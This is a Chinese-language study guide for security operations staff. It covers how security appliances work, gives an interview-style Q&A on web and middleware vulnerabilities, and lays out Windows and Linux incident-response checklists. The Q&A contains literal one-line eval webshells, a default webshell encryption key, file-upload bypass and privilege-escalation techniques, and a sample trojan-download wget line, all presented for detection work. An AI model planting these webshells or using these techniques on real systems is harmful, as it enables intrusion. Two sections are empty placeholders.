（高级）级别B 具备一般的监控+处置+研判+溯源+应急能力
 
 

安全设备

 

1. 数据库审计系统

   工作原理

   数据库安全审计系统主要通过旁路监控并记录对数据库服务器的各类操作行为,通过镜像流量对网络数据进行分析,实时地、智能地解析对数据库服务器的各种操作、恶意攻击事件信息记入审计数据库中以便日后进行查询、分析，细线对目标数据库系统操作的监控和审计。

   其工作在网络层，利用业务协议分析检测技术，能够识别各类数据库的访问协议，FTP协议、TELNET协议、VNC协议、文件共享协议及其他几十种应用层协议。可以兼容市面上大多的数据库类型，如：SQL Server、Oracle、MySQL等。审计行为可包括DDL、DML、DCL等，审计内容可以细化到库、表、记录、用户、存储过程、函数、调用参数等。

2. VPN

   工作原理

   VPN（Virtual Private Network) 又称为虚拟专网服务，它是利用公共网络资源为客户构成专用网的一种业务。

   通常情况下，VPN网关采取双网卡结构，外网卡使用公网IP接入Internet。

   网络一（假定为公网internet）的终端A访问网络二（假定为公司内网）的终端B，其发出的访问数据包的目标地址为终端B的内部IP地址。

   网络一的VPN网关在接收到终端A发出的访问数据包时对其目标地址进行检查，如果目标地址属于网络二的地址，则将该数据包进行封装，封装的方式根据所采用的VPN技术不同而不同，同时VPN网关会构造一个新VPN数据包，并将封装后的原数据包作为VPN数据包的负载，VPN数据包的目标地址为网络二的VPN网关的外部地址。

   网络一的VPN网关将VPN数据包发送到Internet，由于VPN数据包的目标地址是网络二的VPN网关的外部地址，所以该数据包将被Internet中的路由正确地发送到网络二的VPN网关。

   网络二的VPN网关对接收到的数据包进行检查，如果发现该数据包是从网络一的VPN网关发出的，即可判定该数据包为VPN数据包，并对该数据包进行解包处理。解包的过程主要是先将VPN数据包的包头剥离，再将数据包反向处理还原成原始的数据包。

   网络二的VPN网关将还原后的原始数据包发送至目标终端B，由于原始数据包的目标地址是终端B的IP，所以该数据包能够被正确地发送到终端B。在终端B看来，它收到的数据包就和从终端A直接发过来的一样。

   从终端B返回终端A的数据包处理过程和上述过程一样，这样两个网络内的终端就可以相互通讯了。

   常见类型

   SSL VPN是以HTTPS（Secure HTTP，安全的HTTP，即支持SSL的HTTP协议）为基础的VPN技术，工作在传输层和应用层之间。SSL VPN充分利用了SSL协议提供的基于证书的身份认证、数据加密和消息完整性验证机制，可以为应用层之间的通信建立安全连接。SSL VPN广泛应用于基于Web的远程安全接入，为用户远程访问公司内部网络提供了安全保证。

   IPSec VPN是基于IPSec协议的VPN技术，由IPSec协议提供隧道安全保障。IPSec是一种由IETF设计的端到端的确保基于IP通讯的数据安全性的机制。它为Internet上传输的数据提供了高质量的、可互操作的、基于密码学的安全保证。

3. web应用防护（WAF）

   工作原理

   WAF对来自Web应用程序客户端的各类请求进行内容检测和验证，确保其安全性与合法性，对非法的请求予以实时阻断，为Web应用提供防护，也称作应用防火墙，是网络安全纵深防御体系里重要的一环。

   其利用服务器API接口去获取应用层数据，然后匹配自己的规则库，利用正则表达式来分析判断数据的合法性，生成白名单，黑名单，最后，进行访问控制。对请求的内容进行规则匹配、行为分析等识别出恶意行为，并执行相关动作，这些动作包括阻断、记录、告警等。

   WAF是通过检测应用层的数据来进行访问控制或者对应用进行控制。而传统防火墙对三、四层数据进行过滤，从而进行访问控制，不对应用层数据进行分析。

4. 入侵检测系统（IDS）

5. 入侵防御系统（IPS）

   工作原理

   IPS提供主动防护，其设计宗旨是预先对入侵活动和攻击性网络流量进行拦截，避免其造成损失，而不是简单地在恶意流量传送时或传送后才发出警报。IPS 是通过直接嵌入到网络流量中实现这一功能的，即通过一个网络端口接收来自外部系统的流量，经过检查确认其中不包含异常活动或可疑内容后，再通过另外一个端口将它传送到内部系统中。这样一来，有问题的数据包，以及所有来自同一数据流的后续数据包，都能在IPS设备中被清除掉。

   IPS实现实时检查和阻止入侵的原理在于IPS拥有数目众多的过滤器，能够防止各种攻击。当新的攻击手段被发现之后，IPS就会创建一个新的过滤器。IPS数据包处理引擎是专业化定制的集成电路，可以深层检查数据包的内容。如果有攻击者利用L2(数据链路层)至L7(应用层)的漏洞发起攻击，IPS能够从数据流中检查出这些攻击并加以阻止。传统的防火墙只能对L3（网络层）或L4（传输层）进行检查，不能检测应用层的内容。防火墙的包过滤技术不会针对每一字节进行检查，因而也就无法发现攻击活动，而IPS可以做到逐一字节地检查数据包。所有流经IPS的数据包都被分类，分类的依据是数据包中的报头信息，如源IP地址和目的IP地址、端口号和应用域。每种过滤器负责分析相对应的数据包。通过检查的数据包可以继续前进，包含恶意内容的数据包就会被丢弃，被怀疑的数据包需要接受进一步的检查。

   针对不同的攻击行为，IPS需要不同的过滤器。每种过滤器都设有相应的过滤规则，为了确保准确性，这些规则的定义非常广泛。在对传输内容进行分类时，过滤引擎还需要参照数据包的信息参数，并将其解析至一个有意义的域中进行上下文分析，以提高过滤准确性。

6. 安全审计系统（堡垒机 ）

   工作原理

   主要为旁路接入模式，其功能的实现基于和防火墙进行联动。即通过防火墙的访问控制功能，先创建一条信任堡垒机允许访问运维端口（3389、22等）的策略，再在其下方创建一条拒绝所有访问运维端口的策略。如此一来则实现了物理上旁路、逻辑上串行，用户想要运维时，必须通过堡垒机进行跳转登录。

   同时，其具有很强的日志审计功能。由于所有的运维皆是通过其进行操作，故而可以记录所有的运维操作记录，用于溯源。一般包括：录播（完整操作录像，占用较多内存）、标题、字符、命令行等。

   目前型号较早的设备是基于IE内核浏览器的ActiveX插件进行运维操作的，但随着技术的更新已经支持非IE内核的浏览器运维，如goole、Firefox等。

7. 上网行为管理

   工作原理

   是指帮助互联网用户控制和管理对互联网的使用。其包括对网页访问过滤、网络应用控制、带宽流量管理、信息收发审计、用户行为分析。

   在串联模式下可支持对所有端口的控制，直接对不合规连接进行阻断。而旁路模式下，只支持对TCP端口的控制，通过发送rst包拦截，干扰正常的TCP连接实现控制。

   主要功能

   上网身份管理：利用IP/MAC识别方式、用户名/密码认证方式、与已有认证系统的联合单点登录方式准确识别确保上网人员合法性。

   上网终端管理：检查主机的注册表/进程/硬盘文件的合法性，确保接入企业网的终端PC的合法性和安全性。

   移动终端管理：检查移动终端识别码，识别智能移动终端类型/型号，确保接入企业网的移动终端的合法性。

   上网地点管理：检查上网终端的物理接入点，识别上网地点，确保上网地点的合法性。

   搜索引擎管理：利用搜索框关键字的识别、记录、阻断技术，确保上网搜索内容的合法性，避免不当关键词的搜索带来的负面影响。

   网址URL管理 ：利用网页分类库技术，对海量网址进行提前分类识别、记录、阻断确保上网访问的网址的合法性。

   网页正文管理：利用正文关键字识别、记录、阻断技术，确保浏览正文的合法性。

   文件下载管理：利用文件名称/大小/类型/下载频率的识别、记录、阻断技术确保网页下载文件的合法性。

   普通邮件管理：利用对SMTP收发人/标题/正文/附件/附件内容的深度识别、记录、阻断确保外发邮件的合法性。

   WEB邮件管理 ：利用对WEB方式的网页邮箱的收发人/标题/正文/附件/附件内容的深度识别、记录、阻断确保外发邮件的合法性。

   网页发帖管理：利用对BBS等网站的发帖内容的标题、正文关键字进行识别、记录、阻断确保外发言论的合法性。

   即时通讯管理：利用对MSN、飞信、QQ、skype、雅虎通等主流IM软件的外发内容关键字识别、记录、阻断确保外发言论的合法性。

   其他外发管理：针对FTP、TELNET等传统协议的外发信息进行内容关键字识别、记录、阻断确保外发信息的合法性。

   上网应用阻断：利用不依赖端口的应用协议库进行应用的识别和阻断。

   上网应用累计时长限额：针对每个或多个应用分配累计时长、一天内累计使用时间达到限额将自动终止访问。

   上网应用累计流量限额：针对每个或多个应用分配累计流量、一天内累计使用流量达到限额将自动终止访问。

   上网带宽控制：为每个或多个应用设置虚拟通道上限值，对于超过虚拟通道上限的流量进行丢弃。

   上网带宽保障：为每个或多个应用设置虚拟通道下限值，确保为关键应用保留必要的网络带宽。

   上网带宽借用：当有多个虚拟通道时，允许满负荷虚拟通道借用其他空闲虚拟通道的带宽。

   上网带宽平均：每个用户平均分配物理带宽、避免单个用户的流量过大抢占其他用户带宽。

   上网行为实时监控：对网络当前速率、带宽分配、应用分布、人员带宽、人员应用等进行统一展现。

   上网行为日志查询：对网络中的上网人员/终端/地点、上网浏览、上网外发、上网应用、上网流量等行为日志进行精准查询，精确定位问题。

   上网行为统计分析：对上网日志进行归纳汇总，统计分析出流量趋势、风险趋势、泄密趋势、效率趋势等直观的报表，便于管理者全局发现潜在问题。

8. 安全隔离系统（网闸）

   工作原理

   当外网需要有数据到达内网的时候，外部的服务器立即发起对隔离设备的非TCP/IP协议的数据连接，隔离设备将所有的协议剥离，将原始的数据写入存储介质。一旦数据完全写入隔离设备的存储介质，隔离设备立即中断与外网的连接。转而发起对内网的非TCP/IP协议的数据连接。隔离设备将存储介质内的数据推向内网。内网收到数据后，立即进行TCP/IP的封装和应用协议的封装，并交给应用系统。在控制台收到完整的交换信号之后，隔离设备立即切断隔离设备于内网的直接连接。反之同理。

   物理隔离的一个特征，就是内网与外网永不连接，内网和外网在同一时间最多只有一个同隔离设备建立非TCP/IP协议的数据连接。其数据传输机制是存储和转发。而使用非TCP/IP协议的原因在于，TCP/IP协议没有内在的控制机制，来支持源地址的鉴别，来证实IP从哪儿来。黑客就可以利用这个漏洞，通过侦听的方式截取数据，进行篡改。而利用非TCP/IP协议就会使得经过网闸的数据，源地址会变成网闸的接口地址，使得另一端无法探测网闸这一端的网络环境。

9. 防火墙

   工作原理

   防火墙的原理是指设置在不同网络（如可信任的企业内部网和不可信的公共网）或网络安全域之间的一系列部件的组合。它是不同网络或网络安全域之间信息的唯一出入口，通过监测、限制、更改跨越防火墙的数据流，尽可能地对外部屏蔽网络内部的信息、结构和运行状况，有选择地接受外部访问。通过在网络间相互连接的设备上加载允许、禁止来自某些特定的源地址、目的地址、TCP端口号等规则，对通过设备的数据包进行检查，限制数据包进出内部网络。

   主要功能

   访问控制
   地址转换
   流量控制
   抗DDOS功能
   入侵防御（下一代）
   病毒防御（下一代）

   主要部署模式

   桥模式

   桥模式也可叫作透明模式。最简单的网络由客户端和服务器组成，客户端和服务器处于同一网段。为了安全方面的考虑，在客户端和服务器之间增加了防火墙设备，对经过的流量进行安全控制。正常的客户端请求通过防火墙送达服务器，服务器将响应返回给客户端，用户不会感觉到中间设备的存在。工作在桥模式下的防火墙没有IP地址，当对网络进行扩容时无需对网络地址进行重新规划，但牺牲了路由、VPN等功能。

   网关模式

   网关模式适用于内外网不在同一网段的情况，防火墙设置网关地址实现路由器的功能，为不同网段进行路由转发。网关模式相比桥模式具备更高的安全性，在进行访问控制的同时实现了安全隔离，具备了一定的私密性。

   NAT模式

   NAT（Network Address Translation）地址翻译技术由防火墙对内部网络的IP地址进行地址翻译，使用防火墙的IP地址替换内部网络的源地址向外部网络发送数据；当外部网络的响应数据流量返回到防火墙后，防火墙再将目的地址替换为内部网络的源地址。NAT模式能够实现外部网络不能直接看到内部网络的IP地址，进一步增强了对内部网络的安全防护。同时，在NAT模式的网络中，内部网络可以使用私网地址，可以解决IP地址数量受限的问题。

   如果在NAT模式的基础上需要实现外部网络访问内部网络服务的需求时，还可以使用地址/端口映射（MAP）技术，在防火墙上进行地址/端口映射配置，当外部网络用户需要访问内部服务时，防火墙将请求映射到内部服务器上；当内部服务器返回相应数据时，防火墙再将数据转发给外部网络。使用地址/端口映射技术实现了外部用户能够访问内部服务，但是外部用户无法看到内部服务器的真实地址，只能看到防火墙的地址，增强了内部服务器的安全性。

10. asdf
     
     

题库

 
nacos有哪些漏洞：
默认口令，任意用户添加UA_Bypass，任意用户添加末尾斜杠绕过，默认JWT任意用户添加，JWT_Secret_Key硬编码绕过，Identity硬编码绕过
 
tomacat有哪些漏洞：
任意文件写入，远程代码执行，弱口令，后台getshell，session反序列化
 
SpringBoot有哪些漏洞：
远程代码执行，env敏感信息，xxe任意文件读取，
 
dll木马文件如何定位：
procexp进程管理工具查看树状进程关系列表，
 
内存马的类型：
servlet-api型（通过命令执行等方式动态注册一个新的listener、filter或者servlet，从而实现命令执行等功能。特定框架、容器的内存马原理与此类似，如spring的controller内存马，tomcat的valve内存马），字节码增强型（通过java的instrumentation动态修改已有代码，从而实现命令执行等功能）。
查看检查服务器web日志，查看有无可疑的 web 访问日志，比刘说 filter 或者listener 类型的内存马，会有大量url请求路径相同但是附带不同参数的记录，或者页面本身并不存在但是返回 200的请求，通过查找返回 200的urll路径对比 web 目录下是否真实文件，如不存在大概率是内存马，如果Web日志中并未发现异常，可以排查是否为中间件漏洞导致代码执行注入内存马，中间件日志查看是否有可疑的报错。根据注入时间和方法，业务使用的组件排查是否可能存在java代码执行漏洞以及是否存在过 webshell，排查框架漏洞，反序列化漏洞。查看是否有类似哥斯拉、冰蝎特征的urｌ清求，哥斯拉和冰蝎的内存马注入流量特征与普通webshell的流量特征基本差不多
 
中间件解析漏洞介绍下：
IIS（PUT漏洞，短文件名猜解，远程代码执行，解析漏洞），Apache（解析漏洞，目录遍历），Nginx（文件解析，目录遍历，CRLF注入，目录穿越），Tomcat（远程代码执行，war后门文件部署），jBoss（反序列化漏洞，war后门文件部署），WebLogic（反序列化漏洞，SSRF，任意文件上传，war后门文件部署）
安全设备中告警webshell如何判断是不是误报：
看响应，看文件内容，看报文
 
文件上传如何绕过：
客户端（JS绕过，后缀名绕过），黑名单（解析特殊后缀，大小写绕过，空格绕过，点绕过，.htaccess绕过，::DATA绕过，双写后缀名绕过，配合解漏洞析绕过，），白名单（MIME类型检测绕过，%00截断），服务端内容检查（二次渲染绕过，文件头检查，突破getimagesize及exif_imagetype），代码逻辑（条件竞争） &emsp; CSRF和SSRF区别： CSRF是跨站请求伪造，由客户端发起，利用是网站对用户浏览器的信任，导致攻击者可以利用用户的Cookie信息伪造用户请求发送至服务器。 SSRF是服务器端请求伪造，由服务器发起，服务器对用户提供的可控URL过于信任，导致攻击者可以 以此为跳板 攻击内网或其他服务器。 &emsp; sql注入原理+类型+防御： web应用程序对用户输入数据的合法性没有判断，参数用户可控，参数带入数据库查询，攻击者通过构造不同的sql语句来实现对数据库的任意操作。宽字节注入 编码转换，堆叠注入 多语句间用分号隔开，时间盲注 sleep，布尔盲注count，联合查询注入union OrderBy，报错型注入updatexml extractvalue floor，二次注入。过滤危险字符，使用预编译语句。 &emsp; xss原理+利用+防御： 恶意用户将代码注入网页，其他用户在浏览页面时会受到影响 钓鱼，获取cookie，xss蠕虫，打破同源策略 过滤输入的数据和非法字符，对输出到页面的数据进行相应的编码转换 &emsp; 溯源思路： IP定位技术，ID追踪，网站url，恶意样本，社交账号 &emsp; fastjson反序列化漏洞原理+特征： fastjson在解析json的过程中，支持使用autoType来实例化某一个具体的类，autoType标注了类对应的原始类型，方便在反序列化的时候定位到具体类型，fastjson在对JSON字符串进行反序列化的时候，就会读取@type到内容，试图把JSON内容反序列化成这个对象，并且会调用这个类的setter方法。并调用该类的set/get方法来访问属性。通过查找代码中相关的方法，即可构造出一些恶意利用链,造成远程代码执行 特征1根据返回包判断，json数据里有恶意代码片段，@type 指定恶意的类 特征2利用dnslog盲打 &emsp; shiro反序列化原理+特征： Apache Shiro 是一个强大易用的 Java 安全框架，提供了认证、授权、加密和会话管理等功能，对于任何一个应用程序，Shiro 都可以提供全面的安全管理服务。在Apache Shiro<=1.2.4版本中AES加密时采用的key是硬编码在代码中的，于是我们就可以构造RememberMe的值，然后让其反序列化执行 特征1cookie中含有rememberMe字段 &emsp; win查看自启动项： msconfig &emsp; linux查看自启动项： systemctl &emsp; frp流量特征： 一般流量中带有Version、Arch、User、Privilege_key等字段 加密流量中带有一个 0x17）的头部特征 &emsp; webshell流量特征： 哥斯拉 哥斯拉最明显的特征是cookie后面带了;，即使后续没有任何其他内容 响应体有一定特征：哥斯拉会把一个32位的md5字符串按照一半拆分，分别放在base64编码的数据的前后两部分。整个响应包的结构体征为：md5前十六位+base64+md5后十六位 冰蝎2 使用AES-16+Base64加密 需要两次GET访问获取密钥 GET访问中默认webshell的密码为pass，参数值为3位随机数字 密钥是直接接以16位字符的形式返回到客户端 accept里有个q=.2（强特征） 冰蝎3 用AES-16+Base64加密的方式，取消了动态获取密钥的方式，使用固定密钥。AES使用的密钥为Webshell连接密码MD5的前面16位，默认为rebeyond即密钥为e45e329feb5d925b 一般在第二次会返回一个长度比较大的响应包，对应内容为phpinfo页面 连接jsp的webshell的请求数据包中的content-type字段常见为application/octet-stream 冰蝎4 Content-Type字段（弱特征）通常是Content-type: Application/x-www-form-urlencoded Accept字段（弱特征）通常是Accept: application/json, text/javascript, */*; q=0.01 在没有使用自定义传输的情况下，使用的是跟3一样的方式，默认为rebeyond即密钥为e45e329feb5d925b 密文的长度为16的整数倍 蚁剑静态 php使用assert、eval执行 asp使用eval执行 jsp使用Java类加载（ClassLoader） 会带有base64encode、decode的特征 蚁剑动态 存在@ini_set("display_errors", "0");@set_time_limit(0);开头 中间存在echo "d0fa"."402e"、echo "8ae"."52a"类此的拼接的随机数 响应体格式为随机数 结果 随机数，其中两个随机数源于请求体中拼接随机数 结果有时候会采用base64编码，解码可以发现其攻击行为 菜刀静态 PHP: <?php @eval([_post['hacker']]); ?>
ASP: <% eval request("hacker")%>
ASP.NET: <%@ Page Language="Javascript"%><% eval(Request.Item["hacker"],"unsafe");%>
菜刀动态
payload在请求体中，采用url编码+base64编码，payload部分是明文传输
payload中有eval或assert、base64_decode这样的字符
payload中有默认固定的&z0=QGluaV9zZXQ…这样base64加密的攻击载荷，参数z0对应$_POST[z0]接收到的数据，且固定为QGluaV9zZXQ开头
进行base64解码后可看到代码：@ini_set(“display_errors”,“0”);@set_time_limit(0);@set_magic_quotes_runtime(0);这段意思是首先关闭报错和magic_quotes，接下来去获取主机的信息
 
内网提权方法：win（烂土豆，内核漏洞提权），linux（脏牛漏洞，SUID提权，SUDO提权，计划任务，NFS提权，数据库提权）
 
Redis未授权的利用方式：
写计划任务，写SSH公钥，写webshell
 
黄金票据和白银票据区别：黄金可通过伪造TGT获取任意服务ST可请求所有服务，白银只能请求ST中写的服务

268
 
 

应急

 
- win应急处置方案

• 账号排查
  1、查看服务器是否有弱口令，远程管理端口是否对公网开放。
  方法1：据实际情况咨询相关服务器管理员。
  方法2：通过分析平台查询该主机相关告警，确认是否存在弱口令，是否有互联网IP直接访问远程管理端口。
  2、查看服务器是否存在可疑账号、新增账号、隐藏账号、克隆账号。
  方法1：打开 cmd 窗口，输入lusrmgr.msc命令，查看是否有新增/可疑的账号。
  方法2：“D盾_web查杀”—工具—克隆账号检测，查看是否有新增/可疑的账号。

• 端口排查
  检查端口连接情况，是否有远程连接、可疑连接。
  检查方法：
  a、使用D盾_web查杀—工具—端口查看。
  b、netstat -ano 查看目前的网络连接，定位可疑的网络连接。

• 进程排查
  检查方法：
  a、开始--运行--输入msinfo32，依次点击“软件环境→正在运行任务”就可以查看到进程的详细信息，比如路径、处理ID、开始时间、文件日期等。
  b、打开D盾_web查杀工具，进程查看，关注没有签名信息的进程。
  主要观察以下内容：
  没有签名验证信息的进程；
  没有描述信息的进程；
  进程的属主；
  进程的路径是否合法；
  CPU或内存资源占用长时间过高的进程。
  内存资源查看：Win+R—taskmgr，打开任务管理器查看。

• 启动项排查
  检查服务器是否有异常的启动项
  检查方法：
  a、登录服务器，命令行输入“msinfo32”，打开“系统信息-软件环境-启动程序”进行查看。
  b、单击开始菜单 >【运行】，输入 msconfig，查看是否存在命名异常的启动项目，是则取消勾选命名异常的启动项目，并到命令中显示的路径删除文件。
  imjpmig.exe是微软Microsoft输入法编辑器程序
  tintsetp.exe是输入法软件相关程序
  IMEKRMIG.EXE是微软Microsoft Office套装的一部分
  imscinst.exe是微软Microsoft翻译工具的一部分
  imscmig.exe MicrosoftIME输入法的组件
  ctfmon.exe 文字服务程序
  ATIPtaxx.exe是ATI显示卡驱动的一部分,在系统托盘有显示
  rfwmain.exe 瑞星防火墙
  ravtask.exe瑞星杀软相关程序
  c、利用安全软件查看启动项、开机时间管理等。
  d、组策略，运行gpedit.msc—windows设置，查看是否有开机启动的脚本。

• 计划任务排查
  检查方法：
  a、单击【开始】>【控制面板】>【任务计划】，查看计划任务属性，看是否有计划任务的异常文件，有的话便可以发现异常文件的路径。
  b、打开 cmd，然后输入at或者schtasks，检查计算机与网络上的其它计算机之间的会话或计划任务，如有，则确认是否为正常连接。

• 系统日志排查
  分析方法：
  打开运行（Win+R），输入“eventvwr.msc”，回车运行，打开“事件查看器”。
  系统日志默认位置： %SystemRoot%\System32\Winevt\Logs\System.evtx安全日志默认位置：%SystemRoot%\System32\Winevt\Logs\Security.evtx应用程序默认位置：%SystemRoot%\System32\Winevt\Logs\Application.evtx

事件ID	说明
4624	登录成功
4625	登录失败
4634	注销成功
4647	用户启动的注销
4672	使用超级用户（如管理员）进行登录
4720	创建用户
4728	成员已添加到启用安全性的全局组

 

登录类型	描述	说明
2	交互式登录（Interactive）	用户在本地进行登录。
3	网络（Network）	最常见的情况就是连接到共享文件夹或共享打印机时。
4	批处理（Batch）	通常表明某计划任务启动。
5	服务（Service）	每种服务都被配置在某个特定的用户账号下运行。
7	解锁（Unlock）	屏保解锁。
8	网络明文（NetworkCleartext）	登录的密码在网络上是通过明文传输的，如FTP。
9	新凭证（NewCredentials）	使用带/Netonly参数的RUNAS命令运行一个程序。
10	远程交互（RemoteInteractive）	通过终端服务、远程桌面或远程协助访问计算机。
11	缓存交互（CachedInteractive）	以一个域用户登录而又没有域控制器可用

 
1、在“开始”菜单上，依次指向“所有程序”、“管理工具”，然后单击“事件查看器”；
2、在事件查看器中，单击“系统”，查看系统日志；
3、在系统日志右侧操作中，点击“筛选当前日志”，输入事件ID进行筛选分析。

• Web日志排查
  1、查看文件大小
  一般被攻击网站的access日志文件会比日常的access日志文件大
  2、根据入侵时间确认攻击路径及所利用的漏洞
  查看入侵时间前后是否存在异常请求/漏洞攻击
  3、漏洞复现
  若为漏洞类，则进行漏洞复现验证
  若未抓取到账号密码，需向网站负责人索要管理员账号密码，进行登录查找入侵点并验证

• 服务自启动排查
  检查方法：单击【开始】>【运行】，输入services.msc，注意服务状态和启动类型，检查是否有异常服务。

• Webshell扫描
  a、IIS中间件：
  打开D盾_web查杀工具 >> 扫描全部站点。
  b、其它中间件（apache、tomcat、nginx等）
  向客户询问web网站具体路径，例如：D:\apache-tomcat-7.0.55，然后进行自定义扫描。
  Webshell扫描工具：
  D盾_Web查杀：http://www.d99net.net/index.asp
  河马webshell查杀：http://www.shellpub.com

• 病毒查杀
  检查方法：下载相关安全软件，更新最新病毒库，进行全盘扫描。

- linux应急处置方案

• 账号排查
  1、查询特权用户，特权用户(uid 为0)

awk -F: '$3==0{print $1}' /etc/passwd

2、查询可以远程登录的帐号信息

awk '/\$1|\$6/{print $1}' /etc/shadow

3、除root帐号外，其他帐号是否存在sudo权限。如非管理需要，普通帐号应删除sudo权限

more /etc/sudoers | grep -v "^#\|^$" | grep "ALL=(ALL)"

4、禁用或删除多余及可疑的帐号
若存在异常/可疑的账号，和客户/相关责任人确认后再做以下操作

操作命令	说明
usermod -L user	禁用帐号，帐号无法登录，/etc/shadow第二栏为!开头
userdel user	删除user用户
userdel -r user	将删除user用户，并且将/home目录下的user目录一并删除

 

• 历史命令排查
  查看历史操作命令，检查是否存在异常命令；

history #查看历史命令history | grep XXX #XXX为要搜索的异常/敏感命令

常见敏感操作命令示例：

命令介绍	命令示例	备注
查看发行版	cat /etc/*-release	查看版本查找exploit提权
查看内核版本	uname -a	查看版本查找exploit提权
编译exp	gcc xx.c	确认xx.c是否为expploit
添加用户	useradd	确认添加用户是否为客户添加
下载木马文件等	wget http://www.xxx.com	放入云沙箱检测是否为木马病毒文件

 
使用netstat 网络连接命令，分析可疑端口、IP、PID等

netstat -antlp|more

查看下pid所对应的进程文件路径

ls -l /proc/$PID/exe或file /proc/$PID/exe（$PID 为对应的pid 号）

• 进程排查
  使用ps命令，分析进程
  ps aux #查看异常进程
  ps aux | grep pid #查看路径
  top #查看资源占用情况

• 启动项排查
  启动项文件：

more /etc/rc.local/etc/rc.d/rc[0~6].dls -l /etc/rc.d/rc3.d/

• 定时任务排查
  重点关注以下目录中是否存在恶意脚本
  /var/spool/cron/*
  /etc/crontab/etc/cron.d/*
  /etc/cron.daily/*
  /etc/cron.hourly/*
  /etc/cron.monthly/*
  /etc/cron.weekly/*
  /etc/anacrontab
  /var/spool/anacron/*
  小技巧：more /etc/cron.daily/* 查看目录下所有文件

• 服务排查
  1、查询已安装的服务：
  RPM包安装的服务chkconfig --list 查看服务自启动状态，可以看到所有的RPM包安装的服务
  ps aux | grep crond 查看当前服务系统在3与5级别下的启动项
  中文环境chkconfig --list | grep "3:启用|5:启用"
  英文环境chkconfig --list | grep "3:on|5:on"
  级别3：命令行模式
  级别5：GUI（图形桌面 模式）

• 系统日志排查
  日志默认存放位置：/var/log/查看日志配置情况：more /etc/rsyslog.conf

日志文件	说明
/var/log/cron	记录了系统定时任务相关的日志
/var/log/cups	记录打印信息的日志
/var/log/dmesg	记录了系统在开机时内核自检的信息，也可以使用dmesg命令直接查看内核自检信息
/var/log/mailog	记录邮件信息
/var/log/message	记录系统重要信息的日志。这个日志文件中会记录Linux系统的绝大多数重要信息，如果系统出现问题时，首先要检查的就应该是这个日志文件
/var/log/btmp	记录错误登录日志，这个文件是二进制文件，不能直接vi查看，而要使用lastb命令查看，last -f /var/log/btmp
/var/log/lastlog	记录系统中所有用户最后一次登录时间的日志，这个文件是二进制文件，不能直接vi，而要使用lastlog命令查看
/var/log/wtmp	永久记录所有用户的登录、注销信息，同时记录系统的启动、重启、关机事件。同样这个文件也是一个二进制文件，不能直接vi，而需要使用last命令来查看
/var/log/utmp	记录当前已经登录的用户信息，这个文件会随着用户的登录和注销不断变化，只记录当前登录用户的信息。同样这个文件不能直接vi，而要使用w,who,users等命令来查询
/var/log/secure	记录验证和授权方面的信息，只要涉及账号和密码的程序都会记录，比如SSH登录，su切换用户，sudo授权，甚至添加用户和修改用户密码都会记录在这个日志文件中

 
日志分析技巧：
1、定位有多少IP在爆破主机的root帐号：

grep "Failed password for root" /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more

定位有哪些IP在爆破：

grep "Failed password" /var/log/secure|grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"|uniq -c

搜索爆破用户名字典是什么？

grep "Failed password" /var/log/secure|perl -e 'while($_=<>){ /for(.*?) from/; print "$1\n";}'|uniq -c|sort -nr

2、搜索登录成功的IP有哪些：

grep "Accepted " /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more

搜索登录成功的日期、用户名、IP：

grep "Accepted " /var/log/secure | awk '{print $1,$2,$3,$9,$11}'

3、搜索新增用户日志：

grep "useradd" /var/log/secure

4、搜索删除用户的日志：

grep "userdel" /var/log/secure

• Webshell扫描
  1：河马webshell查杀（linux版）：http://www.shellpub.com
  注意:不要将本软件放置到web目录下，不要在web目录下运行软件。
  32位系统：hm-linux-32.tgz
  64位系统：hm-linux-amd64.tgz

1：mkdir starso 新建一个文件夹，将hm文件上传到starso文件夹中。
2：tar -zxvf hm-linux-amd64.tgz解压hm文件
3：./hm scan 网站web目录（网站web目录需向客户确认）查杀shell
4：cat result.csv扫描完成之后结果会保存为result.csv文件，查看可疑文件。
5：检查完成后删除创建的文件夹starso及里面的相关文件。

• 病毒查杀
  安装EDR进行全面的安全扫描和病毒查杀。